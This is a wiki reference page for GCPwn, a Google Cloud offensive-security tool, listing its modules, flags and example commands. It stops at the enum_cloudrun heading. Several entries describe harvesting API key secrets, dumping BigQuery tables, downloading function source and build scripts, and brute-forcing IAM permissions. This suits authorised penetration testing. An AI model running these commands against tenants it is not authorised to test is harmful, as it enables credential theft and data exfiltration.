Skip to content

CLI Module Reference

WebbinRoot edited this page Jul 14, 2026 · 6 revisions

CLI Module Reference

If you are new to GCPwn, read Getting Started first.

This page is meant to be the operator-facing module catalog: what each module does and the custom flags it supports.

This reference is generated from the current module mappings and parser flags in source code.

Table of Contents

Runner Reference

modules list
modules search <keyword>
modules info <module_name>
modules run <module_name> [module_args...]
modules run <module_name> -h

Module Categories

Category Count
Enumeration 47
Exploit 7
Process 2
Unauthenticated 5

GCPwn now ships 50 services. Modules live under four top-level areas: gcpwn/modules/gcp/ (45 GCP service dirs), gcpwn/modules/workspace/ (Google Workspace), gcpwn/modules/everything/ (cross-cutting orchestrators: enum_all, enum_gcp, enum_google_workspace, enum_gcp_policy_bindings, exploit_gcp_setiampolicy, process_gcp_iam_bindings, analyze_vulns), and gcpwn/modules/opengraph/. Dotted module paths follow gcpwn.modules.gcp.<service>.enumeration.enum_<service>. The authoritative module list is gcpwn/mappings/module_mappings.json.

Runner Flags (modules run)

Flag Meaning
--iam Run testIamPermissions checks where supported
--get Perform deeper per-resource retrieval where supported
--download Download module-supported artifact/content output
--project-id, --project-ids, --project-id-file, --current-project, --all-projects Project-scoping selectors for modules that support project targeting
-v, --debug Verbose/debug output where supported

Always verify module-specific flags with modules run <module_name> -h.

High-Value Orchestrator Modules

enum_all

  • Category: Processing
  • Service Group: Everything
  • What It Does:
    • Runs GCPwn's cross-service enumeration workflow from a single module.
    • Supports deep IAM checks (--iam, --all-permissions) as part of the run.
    • Supports centralized download routing while collecting data.
    • Supports Resource Manager scoped-dive controls for org/folder/project IDs while still performing baseline Resource Manager discovery.

Supported Flags

Flag(s) Description Details
--modules Pick which services to run (comma/space separated tokens). Omit to run EVERY service. Accepts short names (storage, iam, bq, gke, secrets, compute, …) or full names (cloud-storage). Replaces the old per-service flags. e.g. --modules storage,iam gke
--list-modules Print every --modules service token (with aliases) and exit. store_true
--skip-resource-manager, --no-enum-resources Skip Resource Manager discovery: do NOT (re-)enumerate projects/folders/orgs; reuse the already-cached hierarchy. Use when it is unchanged since a prior (slow) run. store_true
--parallel-services Enumerate services concurrently across projects with N workers (default 1 = sequential). Prints a resume token at start. int, default 1
--resume Resume a prior --parallel-services run by its token: re-runs ONLY the units left incomplete. token string
--list-tokens List saved resume tokens (interrupted/failed parallel runs) and exit. store_true
--stop-on-denied Speed knob: on the FIRST 403 permission-denied in a service's region/zone fan-out, skip that service's remaining regions (treat like a disabled API) instead of probing every region. OFF by default (a denial in one region doesn't prove denial in another). store_true
--download-output Output directory for downloaded artifacts. string path
--threads Worker threads for region/zone fan-out. int, default 4
--regions-list Regions in comma-separated format. e.g. us-central1,us-east1
--zones-list Zones in comma-separated format. e.g. us-central1-a,us-east1-b
--project-allowlist Resource Manager project ID scoped-dive filter (inline). accepts space/comma-separated project IDs
--project-allowlist-file Resource Manager project ID scoped-dive filter (file). one ID per line
--folder-allowlist Resource Manager folder ID scoped-dive filter (inline). numeric IDs only; space/comma-separated
--folder-allowlist-file Resource Manager folder ID scoped-dive filter (file). numeric IDs only; one ID per line
--org-allowlist Resource Manager organization ID scoped-dive filter (inline). numeric IDs only; space/comma-separated
--org-allowlist-file Resource Manager organization ID scoped-dive filter (file). numeric IDs only; one ID per line
--parent-allowlist-folder Parent folder scope constraint (inline). numeric IDs only; intersects descendants with direct allowlist scope
--parent-allowlist-folder-file Parent folder scope constraint (file). numeric IDs only; one ID per line
--parent-allowlist-org Parent organization scope constraint (inline). numeric IDs only; intersects descendants with direct allowlist scope
--parent-allowlist-org-file Parent organization scope constraint (file). numeric IDs only; one ID per line
--all-resource-permissions, --all-permissions For Resource Manager, pass full large permission test set. alias pair, dest=all_resource_permissions
--download Enable download token routing. optional value, default token set when passed with no value
--dont-download Exclude download tokens/categories from --download. comma-separated
--download-timeout Per-unit wall-clock cap (seconds) on downloads: skip the rest of a unit and move on once it is exceeded. Per bucket for Cloud Storage; per download type, per project for every other service. 0/unset = unlimited. See Downloads-to-Disk. int seconds, default 0
--download-google-drive Opt-in Google Drive in the Workspace phase: runs enum_drive --all-users --download (lists AND downloads Drive file content for every cached user). OFF by default so Drive files are never pulled by accident; separate from the GCP --download categories. store_true
--iam Execute testIamPermissions wherever applicable. store_true
--get Fetch deeper per-resource metadata where supported. store_true
--debug Enable debug logging. store_true
--asset-inventory Opt-in Cloud Asset Inventory scan (also selectable as --modules asset-inventory / alias cai). Additive: a bare enum_all SKIPS it; adding it runs everything PLUS it. store_true

Service selection moved to --modules. There are no longer per-service --cloud-storage / --gke / … flags — an old flag now errors with "unrecognized arguments". Select services with --modules <tokens> (comma/space separated), or omit it to run everything. Run modules run enum_all --list-modules for the full token list (each service's canonical token plus friendly aliases like storage/gcs, iam, bq, compute/gce, secrets, rm).

Scoped-dive behavior notes:

  • enum_all performs broad Resource Manager discovery by default. Pass --no-enum-resources (a.k.a. --skip-resource-manager) to skip it and reuse the already-cached hierarchy — handy when you've already enumerated projects/folders/orgs and nothing has changed.
  • If no allowlist flags are provided, all discovered resources/projects are in scope.
  • When any allowlist flag is provided (--project-allowlist*, --folder-allowlist*, --org-allowlist*), deeper Resource Manager actions (--get, --iam, recursive dive) are scoped to those IDs.
  • If you provide one direct allowlist type (for example project allowlist only), the other resource types are treated as out of scope unless explicitly allowlisted.
  • Parent allowlist flags (--parent-allowlist-folder*, --parent-allowlist-org*) apply descendant filtering (any nested depth). With direct allowlists present, effective scope is an intersection; with parent-only allowlists, scope becomes all descendants under those parents.
  • When any allowlist flag is provided, non-Resource-Manager service modules are only executed for projects that resolve into the effective allowlist scope.
  • Exception: enum_gcp_policy_bindings is still invoked once at the end of enum_all (final loop) to build policy-binding cache/output.
  • enum_all runs GCP services plus a once-only Google Workspace phase at the end. enum_gcp is identical to enum_all but without the trailing Workspace phase; enum_google_workspace runs only the Workspace enumerators once (tenant-scoped, needs Workspace admin creds or service-account domain-wide delegation).
  • --asset-inventory is additive and opt-in: a bare enum_all skips the (slow, org-wide) Cloud Asset Inventory scan; pass --asset-inventory to run everything else PLUS it.

Example Module Commands

# TLDR: Full baseline cross-service run with IAM checks
modules run enum_all --iam

# TLDR: Full baseline + broad permission brute checks at org/folder/project scope
modules run enum_all --iam --all-permissions

# TLDR: List every --modules service token (with aliases), then exit
modules run enum_all --list-modules

# TLDR: Run only compute + storage families with constrained regions
modules run enum_all --modules compute,storage --regions-list us-central1

# TLDR: Run just IAM + Cloud Storage + GKE (short tokens; comma OR space separated)
modules run enum_all --modules iam,storage gke

# TLDR: Reuse the cached project/folder/org hierarchy (skip Resource Manager re-discovery)
modules run enum_all --iam --no-enum-resources

# TLDR: Speed up a broad run by short-circuiting a service's regions on the first 403 denial
modules run enum_all --iam --stop-on-denied

# TLDR: Enable download routing, but exclude large content buckets
modules run enum_all --download --dont-download buckets

# TLDR: Download everything, but time-box each unit (per bucket / per download type) to 90s
modules run enum_all --download --download-timeout 90

# TLDR: Keep broad Resource Manager discovery but scope deep dive to selected IDs
modules run enum_all --modules resource-manager --iam --get --project-allowlist-file projects.txt --folder-allowlist 123456789012 --org-allowlist-file org_ids.txt

# TLDR: Scope to descendants under parent folders/orgs
modules run enum_all --parent-allowlist-folder-file parent_folders.txt --parent-allowlist-org 123456789012

# TLDR: Run everything PLUS the opt-in Cloud Asset Inventory scan
modules run enum_all --iam --asset-inventory

# TLDR: GCP only, no trailing Google Workspace phase
modules run enum_gcp --iam

# TLDR: Google Workspace tenant-scoped enumeration only
modules run enum_google_workspace --impersonate admin@your-domain.com

enum_gcp

GCP-only sibling of enum_all: identical service coverage, allowlist scoping, download routing, and --parallel-services / --resume / --list-tokens behavior, but without the trailing once-only Google Workspace phase. Reach for enum_gcp when your credentials are GCP-only (most service-account keys) so you don't spend a phase probing Workspace APIs you can't reach. Every enum_all flag above applies here unchanged.

Example Module Commands

# TLDR: Full GCP baseline with IAM checks (no Workspace phase)
modules run enum_gcp --iam

# TLDR: Fan services out across projects with 5 workers (resumable by token)
modules run enum_gcp --iam --parallel-services 5

# TLDR: List saved run tokens (interrupted runs) so you can pick one to resume
modules run enum_gcp --list-tokens

# TLDR: Resume a specific interrupted run by its token
modules run enum_gcp --parallel-services 5 --resume 20260101120000

enum_google_workspace

Runs only the Google Workspace enumerators (Cloud Identity + Admin SDK Directory), once, tenant-scoped — the same phase enum_all appends at the end, exposed as a standalone module. Requires Workspace admin credentials or a service account with domain-wide delegation (--impersonate <admin@domain>); ordinary GCP service-account keys have no Workspace access and this will no-op for them. It is tenant-scoped (not per-project), so run it once per workspace.

Example Module Commands

# TLDR: Enumerate the Workspace tenant via domain-wide delegation
modules run enum_google_workspace --impersonate admin@your-domain.com

enum_gcp_policy_bindings

  • Category: Processing
  • Service Group: Everything
  • What It Does:
    • Collects IAM allow-policy bindings (getIamPolicy) across the discovered resource tree.
    • Also enumerates IAM deny policies (IAM v2 Policies API) for each org/folder/project scope into iam_deny_policies — see IAM Enumeration & Analysis Workflow.
    • Reads from cached workspace resource tables; previously enumerated resources can still be included.
    • Uses Cloud Asset Inventory when available.
    • Falls back to per-service APIs for Storage, BigQuery, Compute, Functions, Secrets, KMS, Run, Pub/Sub, Spanner, Service Directory, Cloud Tasks, and Artifact Registry.

Cache behavior note:

  • enum_all allowlists control which service modules run, but enum_gcp_policy_bindings operates on cached resources already in the workspace DB.
  • If you previously enumerated resources outside the current allowlist, those resources can still be included when enum_gcp_policy_bindings runs.

Supported Flags

Flag(s) Description Details
--ensure-tree If hierarchy data is missing, run Resource Manager collection first. store_true
--no-ensure-tree Never run Resource Manager here; use only the already-cached hierarchy. Set automatically by enum_all --no-enum-resources. store_true
--resource-manager Enumerate org/folder/project IAM policies. store_true; service filter
--storage Enumerate Cloud Storage bucket IAM policies. store_true; service filter
--bigquery Enumerate BigQuery dataset IAM policies. store_true; service filter
--functions Enumerate Cloud Functions IAM policies. store_true; service filter
--compute Enumerate Compute Engine instance IAM policies. store_true; service filter
--service-accounts Enumerate service account IAM policies. store_true; service filter
--secrets Enumerate Secret Manager IAM policies. store_true; service filter
--cloud-run Enumerate Cloud Run service/job IAM policies. store_true; service filter
--cloud-tasks Enumerate Cloud Tasks queue IAM policies. store_true; service filter
--artifact-registry Enumerate Artifact Registry repository IAM policies. store_true; service filter
--cloud-kms Enumerate KMS keyring/cryptokey IAM policies. store_true; service filter
--pubsub Enumerate Pub/Sub topic/subscription/snapshot/schema IAM policies. store_true; service filter
--service-directory Enumerate Service Directory namespace/service IAM policies. store_true; service filter
-v, --debug Enable low-level debug logging. store_true

Example Module Commands

# TLDR: Enumerate IAM policies across all supported services
modules run enum_gcp_policy_bindings

# TLDR: Ensure hierarchy exists first, then collect only selected services
modules run enum_gcp_policy_bindings --ensure-tree --resource-manager --storage --bigquery

# TLDR: Focus on service-account and Cloud Run policy surfaces with debug logging
modules run enum_gcp_policy_bindings --service-accounts --cloud-run --debug

process_gcp_iam_bindings

  • Category: Process
  • Service Group: Everything
  • What It Does:
    • Processes enumerated IAM role/binding data for risky permission patterns.
    • Supports both convenience and custom roles alongside predefined GCP roles.
    • Exports findings to CSV or TXT formats.

Supported Flags

Flag(s) Description Details
--force-refresh-bindings Re-enumerate IAM bindings before processing. store_true; useful after new enumeration data
--csv Write CSV output report. store_true
--txt Write TXT output report. store_true
--output Output directory for report files. optional path
--silent Suppress stdout summary output. store_true
-v, --debug Enable verbose processing logs. store_true

Example Module Commands

# TLDR: Process existing IAM bindings with default console output
modules run process_gcp_iam_bindings

# TLDR: Force refresh IAM bindings first, then export CSV report
modules run process_gcp_iam_bindings --force-refresh-bindings --csv --output ./gcpwn_output/reports

# TLDR: Produce TXT output quietly for file-only workflows
modules run process_gcp_iam_bindings --txt --silent --output ./gcpwn_output/reports

process_og_gcpwn_data

  • Category: Processing
  • Service Group: OpenGraph
  • What It Does:
    • Builds OpenGraph-oriented IAM/resource context from collected workspace data.
    • Exports BloodHound-compatible GCP OpenGraph JSON.
    • Can build the graph directly from a Cloud Asset Inventory export file (--cai-file) with no prior enumeration and no SQLite tables.

Supported Flags

Flag(s) Description Details
-o, --out Output directory for OpenGraph JSON exports (files written as opengraph_<folder_name>.json). optional dir path
--reset Delete existing OpenGraph rows for this workspace before rebuilding. store_true
--use-existing-opengraph-db Skip the rebuild and re-export the existing opengraph_nodes/opengraph_edges. store_true; cannot combine with --cai-file
--cai-file Build the graph directly from a Cloud Asset Inventory export FILE (NDJSON from gcloud asset export, or a JSON array of assets) INSTEAD of the SQLite tables. No prior enumeration needed; the generated graph is exported but NOT persisted to the workspace. path to export file
--split-json-output Additionally write sectioned/chunked JSON files for easier BloodHound uploads. store_true
--include-all Include generic IAM binding edges, not only collapsed dangerous built-in edges. Default mode collapses dangerous CAN_* into ROLE_OWNER/ROLE_EDITOR. store_true
--expand-inherited Fan ancestor (org/folder) bindings DOWN to every descendant scope; each descendant binding node gets a @<scope>#src:<source> provenance suffix and its own dangerous edges. Without it, an ancestor binding stays attached to the ancestor only. store_true
--cond-eval Conditional-evaluation pass-through mode. Conditioned bindings already get a #cond:<hash> node suffix and conditional/condition_expr_raw/condition_hash properties; this flag does not evaluate the CEL or narrow resources yet (output is identical on or off). store_true; no-op filtering
--groups Run only the users/groups mapping step. store_true; step selector
--iam-bindings Run only the IAM bindings graph step. store_true; step selector
--inferred-permissions Run only the inferred credential-permissions graph step. store_true; step selector
--resource-expansion Run only the resource expansion graph step. store_true; step selector
-v, --debug Enable verbose graph-build logging. store_true

Example Module Commands

# TLDR: Full OpenGraph build and export to a directory
modules run process_og_gcpwn_data --reset --out ./gcpwn_output/opengraph

# TLDR: Expand inherited IAM edges and include broader IAM edge set
modules run process_og_gcpwn_data --expand-inherited --include-all --out ./gcpwn_output/opengraph

# TLDR: Run only targeted graph stages
modules run process_og_gcpwn_data --iam-bindings --resource-expansion --out ./gcpwn_output/opengraph

# TLDR: Build the graph straight from a Cloud Asset Inventory export file (no enumeration / no DB)
modules run process_og_gcpwn_data --cai-file ./cai_export.ndjson --out ./gcpwn_output/opengraph

process_og_node_color_images

  • Category: Processing
  • Service Group: OpenGraph
  • What It Does:
    • Pushes OpenGraph/BloodHound custom node-type metadata to a BloodHound custom-node endpoint.
    • Useful as a standalone styling step after graph generation.

Supported Flags

Flag(s) Description Details
--push-custom-node-attributes-url BloodHound custom-node endpoint URL for node-attribute push. default http://127.0.0.1:8080/api/v2/custom-nodes
--push-custom-node-attributes-token Bearer token used for custom-node push. optional string token
--custom-node-auth-mode Auth mode for style sync (bearer or signature). default bearer
--push-custom-node-attributes-token-id API token ID for signature auth mode. optional string token ID
--push-custom-node-attributes-token-key API token key/secret for signature auth mode. optional string token key
--prompt-custom-node-token Prompt for bearer token if none is supplied. store_true; interactive
--prompt-custom-node-signature-creds Prompt for API token ID/key if none is supplied (signature mode). store_true; interactive

Example Module Commands

# TLDR: Push custom node metadata directly
modules run process_og_node_color_images \
  --push-custom-node-attributes-url http://127.0.0.1:8080/api/v2/custom-nodes \
  --push-custom-node-attributes-token <BLOODHOUND_BEARER_TOKEN>

# TLDR: Signature auth direct flags
modules run process_og_node_color_images \
  --custom-node-auth-mode signature \
  --push-custom-node-attributes-token-id <TOKEN_ID> \
  --push-custom-node-attributes-token-key <TOKEN_KEY>

Interactive walkthrough example output:

(None:None)> modules run process_og_node_color_images
[*] No arguments supplied. Launching BloodHound custom-node sync setup.
[*] BloodHound custom-node URL (press Enter to use default: http://127.0.0.1:8080/api/v2/custom-nodes):
> Custom-node sync: choose auth mode
>> [1] Bearer JWT
>> [2] API key signature
> [3] Exit
> Choose an option: 2
> Choose a saved BloodHound API token or enter a new one:
>> [1] Saved Token ID: <TOKEN_ID> (http://127.0.0.1:8080/api/v2/custom-nodes)
>> [2] Enter a new API token ID/key
> [3] Exit
> Choose an option: 1
[*] custom-nodes sync complete: unchanged=46, updated=0, created=0

Module Catalog

Every module runs three ways:

  • In the REPL: modules run <module_name> [flags]
  • Non-interactive drive-through (authenticated): gcpwn --module <module_name> --workspace WORKSPACE_NAME --cred CRED_NAME [project selector] [flags] — see Non-Interactive Runs.
  • Non-interactive (unauthenticated): gcpwn --module <unauth_module> [flags]

Flags shared across most enumeration modules:

  • Project scope: --project-id / --project-ids / --project-id-file, --current-project, or --all-projects.
  • Region/zone scope: --all-regions / --all-zones, or --regions-list / --zones-list (comma lists), or --regions-file / --zones-file.
  • --get hydrate full per-resource detail; --iam run testIamPermissions per resource; --download save fetched payloads/loot to disk (module-specific); -v / --debug verbose.
  • Component selectors (--<component>) limit an enumerator to specific resource types; omit to run all.

Resuming a long run (token-based): the long enumerators — enum_all / enum_gcp (with --parallel-services N), enum_gcp_policy_bindings, and enum_google_workspace — record each completed work unit in a workspace-scoped ledger keyed by a per-run token, printed at the start of every run (e.g. [*] Run token: 20260710131846). A plain re-run starts from the beginning (fresh token). To continue an interrupted run instead, pass --resume <token> — it re-runs only the units that token left incomplete. Unit granularity: (project, service) for enum_all/enum_gcp, per service-group for enum_gcp_policy_bindings, per enumerator for enum_google_workspace.

The examples below use WORKSPACE_NAME, CRED_NAME, and PROJECT_ID as placeholders — substitute your own workspace/credential/project names.

Enumeration Modules

enum_agentplatform

  • Service Group: AgentPlatform
  • What It Does: Enumerates Vertex AI (aiplatform) resources — datasets, endpoints, models, featurestores and their entity types, feature groups/online stores/views, reasoning engines, and notebook runtime templates. Offensive angle: inventories ML/AI assets (training data, deployed models, agent reasoning engines) and can test IAM permissions against them for access and potential model/data theft.
  • Key Flags: Component selectors --datasets, --endpoints, --models, --featurestores, --entity-types, --feature-groups, --feature-online-stores, --feature-views, --reasoning-engines, --notebook-runtime-templates (resources are global-scoped); --iam (TestIamPermissions; endpoints unsupported); --get; --debug. Run modules run enum_agentplatform -h for full options.
  • Example:
    modules run enum_agentplatform --datasets --models --reasoning-engines --iam
    gcpwn --module enum_agentplatform --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --datasets --models --reasoning-engines --iam

enum_all

  • Service Group: Everything
  • What It Does: One-command cross-service enumeration: runs every GCP enumerator (optionally with IAM permission checks and broad permission brute-forcing), routes module download outputs, then runs a trailing tenant-scoped Google Workspace phase. See High-Value Orchestrator Modules above for the full flag reference.
  • Key Flags: --modules <tokens> to pick services (or none to run all); --no-enum-resources to reuse the cached hierarchy; --stop-on-denied to short-circuit a service's regions on the first 403; --parallel-services N (parallel, ledger-resumable); IAM/permission and download-routing flags. Run modules run enum_all -h (or --list-modules) for full options.
  • Example:
    modules run enum_all --modules storage,iam --parallel-services 4
    gcpwn --module enum_all --workspace WORKSPACE_NAME --cred CRED_NAME --all-projects --parallel-services 4
    # a plain re-run starts fresh; to resume after Ctrl+C/failure, pass --resume <token> (the token is printed at run start)

enum_gcp

  • Service Group: Everything
  • What It Does: Runs every GCP enumeration module across the selected project(s) and pipelines IAM allow-policy bindings per hierarchy node; the GCP-only variant of enum_all (skips the Workspace phase). It builds the full resource + IAM picture used for permission analysis and OpenGraph attack-path graphing.
  • Key Flags: --parallel-services N (cross-project pool + ledger-based resume), --threads N (region/zone fan-out), per-service selectors like --cloud-storage/--cloud-compute/--gke/--cloud-run/--cloud-kms/--resource-manager (default: all), --iam, --get, --all-resource-permissions, --download [all]/--dont-download, --download-output, --download-timeout N (per-unit wall-clock cap on downloads: per bucket for Cloud Storage, per download type per project elsewhere — see Downloads-to-Disk), --regions-list/--zones-list, -v/--debug. Run modules run enum_gcp -h for full options.
  • Example:
    modules run enum_gcp --iam --parallel-services 4
    gcpwn --module enum_gcp --workspace WORKSPACE_NAME --cred CRED_NAME --all-projects --iam --parallel-services 4
    # a plain re-run starts fresh; to resume after Ctrl+C/failure, pass --resume <token> (the token is printed at run start)

enum_google_workspace

  • Service Group: Google Workspace
  • What It Does: Tenant-scoped run-once orchestrator that runs every registered Workspace enumerator in turn (Cloud Identity groups/memberships/users, admin roles + role assignments, org units, domains, mobile devices, OAuth tokens), passing args straight through and tolerating individual module failures. Builds the full Workspace identity/privilege picture in one call.
  • Key Flags: args pass through to sub-modules — tenant scope --customer-id C.../--org-id <numeric>, --impersonate <admin@domain> (SA domain-wide delegation), --transitive, --get, -v/--debug. Run modules run enum_google_workspace -h for full options.
  • Example:
    modules run enum_google_workspace --customer-id C0xxxxxxx --impersonate admin@example.com
    gcpwn --module enum_google_workspace --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --impersonate admin@example.com

enum_apigateway

  • Service Group: API Gateway
  • What It Does: Enumerates API Gateway APIs, gateways, and API configs (via GAPIC list/get) and can download the OpenAPI documents embedded in each config; the offensive angle is surfacing gateway hostnames/managed services and each config's gateway_service_account (the identity the deployed gateway runs as).
  • Key Flags: Component selectors --apis / --gateways / --configs (default: all); gateways are region-scoped via --all-regions | --regions-list | --regions-file; --get (hydrate full payloads), --iam (TestIamPermissions on gateways/APIs/configs), --download (write config OpenAPI docs to loot, implies --get); manual id args --api-ids / --gateway-ids / --config-ids. Run modules run enum_apigateway -h for full options.
  • Example:
    modules run enum_apigateway --gateways --configs --all-regions --iam --download
    gcpwn --module enum_apigateway --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --gateways --configs --all-regions --iam --download

enum_apikeys

  • Service Group: API Keys
  • What It Does: Enumerates project API Keys (api_keys_v2 list/get) and can retrieve/persist each key's secret key_string via getKeyString; the offensive angle is recovering usable API key secrets for downstream unauthenticated abuse (Maps/Gemini/Vertex).
  • Key Flags: Component selector --keys (default); --include-key-string (fetch sensitive secret strings, implies --get); --download (write captured key strings to loot files, implies --get); --get (hydrate key payload); manual id arg --key-ids (short my-key or full projects/.../keys/KEY_ID). Run modules run enum_apikeys -h for full options.
  • Example:
    modules run enum_apikeys --keys --include-key-string --download
    gcpwn --module enum_apikeys --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --keys --include-key-string --download

enum_appengine

  • Service Group: App Engine
  • What It Does: Enumerates the App Engine hierarchy (the per-project application singleton, services, versions, and running instances) via appengine_admin_v1; the offensive angle is exposing deployed runtimes/environments, traffic splits, and the VM instances backing each version.
  • Key Flags: Component selectors --app / --services / --versions / --instances (versions nest under services, instances under versions; default: all); --get (hydrate full payloads); manual id args --app-name / --service-ids / --version-ids / --instance-ids (no --iam — IAM unsupported here). Run modules run enum_appengine -h for full options.
  • Example:
    modules run enum_appengine --services --versions --instances --get
    gcpwn --module enum_appengine --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --services --versions --instances --get

enum_artifactregistry

  • Service Group: Artifact Registry
  • What It Does: Enumerates Artifact Registry repositories, packages, and versions (plus typed Docker/Python/npm/Maven/apt/yum listings) and can download artifact file bytes from the registry; the offensive angle is pulling published packages/images (potential source, secrets, or supply-chain footholds) out of the loot directory.
  • Key Flags: Core selectors --repositories / --packages / --versions; optional typed selectors --docker-images / --python-packages / --npm-packages / --maven-artifacts / --apt-artifacts / --yum-artifacts; region scope --all-regions | --regions-list | --regions-file; --download[=SCOPE] (comma-list or all; Docker is references-only), --limit, --get, --iam (repositories), --threads; manual inputs --repository-ids (LOCATION/ID), --repository-names / --repository-names-file (full names), --package-names. Run modules run enum_artifactregistry -h for full options.
  • Example:
    modules run enum_artifactregistry --repositories --all-regions --iam --download all --threads 5
    gcpwn --module enum_artifactregistry --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --repositories --all-regions --iam --download all --threads 5

enum_batch

  • Service Group: Batch
  • What It Does: Enumerates Cloud Batch jobs per project+location (batch_v1 list/get, read-only) and can download the runnable script command text embedded in each job's task groups; the offensive angle is reading job definitions/inline scripts that may contain credentials or sensitive commands.
  • Key Flags: Component selector --jobs (default); region scope --all-regions (wildcard location -) | --regions-list | --regions-file; --download (write per-job runnable script text to loot, implies --get), --get, --debug (no --iam). Run modules run enum_batch -h for full options.
  • Example:
    modules run enum_batch --jobs --regions-list us-central1 --download
    gcpwn --module enum_batch --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --jobs --regions-list us-central1 --download

enum_bigquery

  • Service Group: BigQuery
  • What It Does: Enumerates BigQuery datasets, tables, and routines (UDFs/procedures) and can bulk-download full table contents to JSONL loot files; the offensive angle is dumping sensitive table data (bigquery.tables.getData) and reviewing routine definitions.
  • Key Flags: Component selectors --datasets / --tables / --routines (nest under datasets; default: all); --download[=table] (stream table rows to JSONL, forces --tables+--get), --download-limit N (cap tables, 0 = unlimited), --get, --iam (TestIamPermissions on tables/routines); manual id args --dataset-ids (project.dataset), --table-ids (project.dataset.table), --routine-ids (project.dataset.routine). Run modules run enum_bigquery -h for full options.
  • Example:
    modules run enum_bigquery --datasets --tables --iam --download table --download-limit 5
    gcpwn --module enum_bigquery --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --datasets --tables --iam --download table --download-limit 5

enum_bigtable

  • Service Group: Bigtable
  • What It Does: Enumerates Cloud Bigtable instances, tables, backups (swept across all clusters), and authorized views via the admin v2 clients (read-only); the offensive angle is mapping data stores plus recoverable backups and probing instance/table permissions.
  • Key Flags: Component selectors --instances / --tables / --backups / --authorized-views (tables/backups nest under instances, authorized-views under tables; default: all); --iam (TestIamPermissions on instances and tables), --get, --debug. Run modules run enum_bigtable -h for full options.
  • Example:
    modules run enum_bigtable --instances --tables --backups --iam
    gcpwn --module enum_bigtable --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --tables --backups --iam

enum_cloudbuild

  • Service Group: Cloud Build
  • What It Does: Enumerates Cloud Build triggers, recent builds, and repository connections across regions. Build/trigger configs expose the service account builds run as and often leak secrets/source in build steps, which the --download build/step summaries capture for review.
  • Key Flags: Component selectors --triggers / --builds / --connections; manual ids --trigger-ids / --build-ids / --connection-ids; region scope --all-regions | --regions-list | --regions-file; --page-size (builds); --get; --iam (connections only); --download [build] with --download-limit. Run modules run enum_cloudbuild -h for full options.
  • Example:
    modules run enum_cloudbuild --builds --all-regions --download --download-limit 20
    gcpwn --module enum_cloudbuild --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --builds --all-regions --download --download-limit 20

enum_cloudcomposer

  • Service Group: Cloud Composer
  • What It Does: Read-only enumeration of Cloud Composer (managed Airflow) environments per region. Environment configs reveal the runtime service account, GKE/network wiring, and Airflow settings; --download writes each environment's config to disk for offense review.
  • Key Flags: Component selector --environments; region scope --all-regions (wildcard -) | --regions-list | --regions-file; --get; --download. Run modules run enum_cloudcomposer -h for full options.
  • Example:
    modules run enum_cloudcomposer --environments --regions-list us-central1 --download
    gcpwn --module enum_cloudcomposer --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --environments --regions-list us-central1 --download

enum_cloudcompute_lb

  • Service Group: Compute
  • What It Does: Enumerates Compute Engine load-balancing surfaces — backend buckets/services, forwarding rules, URL maps, and target proxies. The offensive angle is discovering public-facing entry points and how front-end rules map to back-end services.
  • Key Flags: Region scope --all-regions | --regions-list | --regions-file; --get, --iam, --threads (parallelism). Run modules run enum_cloudcompute_lb -h for full options.
  • Example:
    modules run enum_cloudcompute_lb --all-regions --iam
    gcpwn --module enum_cloudcompute_lb --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --all-regions --iam

enum_cloudcompute_network

  • Service Group: Compute
  • What It Does: Enumerates Compute Engine networking — VPC networks, subnetworks, firewall rules, routers/NAT, VPN gateways/tunnels, peerings, and interconnect attachments. The offensive angle is mapping reachability and exposed surfaces (open firewall rules, external IPs) across the environment.
  • Key Flags: Region scope --all-regions | --regions-list | --regions-file; --get, --iam, --threads (parallelism). Run modules run enum_cloudcompute_network -h for full options.
  • Example:
    modules run enum_cloudcompute_network --all-regions --iam --threads 5
    gcpwn --module enum_cloudcompute_network --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --all-regions --iam

enum_cloudcompute_resources

  • Service Group: Compute
  • What It Does: Enumerates the core Compute Engine resource plane — projects, instances, disks, images, snapshots, machine images, node groups, reservations, and instance groups. The offensive angle is that each instance exposes its attached service account and metadata, and you can pull serial-port output or take a screenshot of a running VM.
  • Key Flags: Broad scope --all-regions / --all-zones; targeted --regions-list / --zones-list (+ -file variants); --instance-names / --instance-names-file (instance targeting); --get, --iam; artifact capture --download-serial (serial console output) and --take-screenshot; --output. Run modules run enum_cloudcompute_resources -h for full options.
  • Example:
    modules run enum_cloudcompute_resources --all-zones --iam --get --download-serial
    gcpwn --module enum_cloudcompute_resources --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --all-zones --iam --get

enum_clouddns

  • Service Group: Cloud DNS
  • What It Does: Enumerates Cloud DNS managed zones (project-scoped) and their record sets. Record sets map internal hostnames/IPs and can surface dangling records for subdomain takeover; --download writes per-zone CSV-style record files.
  • Key Flags: Component selectors --zones / --record_sets; manual --zone-names; --record-type filter (A/CNAME/TXT); --get; --iam (zones); --download. Run modules run enum_clouddns -h for full options.
  • Example:
    modules run enum_clouddns --zones --record_sets --record-type A --download
    gcpwn --module enum_clouddns --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --zones --record_sets --record-type A --download

enum_cloudfunctions

  • Service Group: Cloud Functions
  • What It Does: Enumerates Cloud Functions (v1/v2) across regions, capturing each function's runtime service account, HTTPS trigger URL, and state. --download pulls the deployed source bundle, --external-curl probes function URLs for anonymous invocation.
  • Key Flags: Component selector --functions; manual --function-names (with --version 1|2); region scope --v1-regions / --v2-regions / --v1v2-regions | --regions-list | --regions-file; --get; --iam; --download (source bundles, --output dir); --external-curl. Run modules run enum_cloudfunctions -h for full options.
  • Example:
    modules run enum_cloudfunctions --functions --v1v2-regions --download --external-curl
    gcpwn --module enum_cloudfunctions --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --functions --v1v2-regions --download --external-curl

enum_cloudrun

  • Service Group: Cloud Run
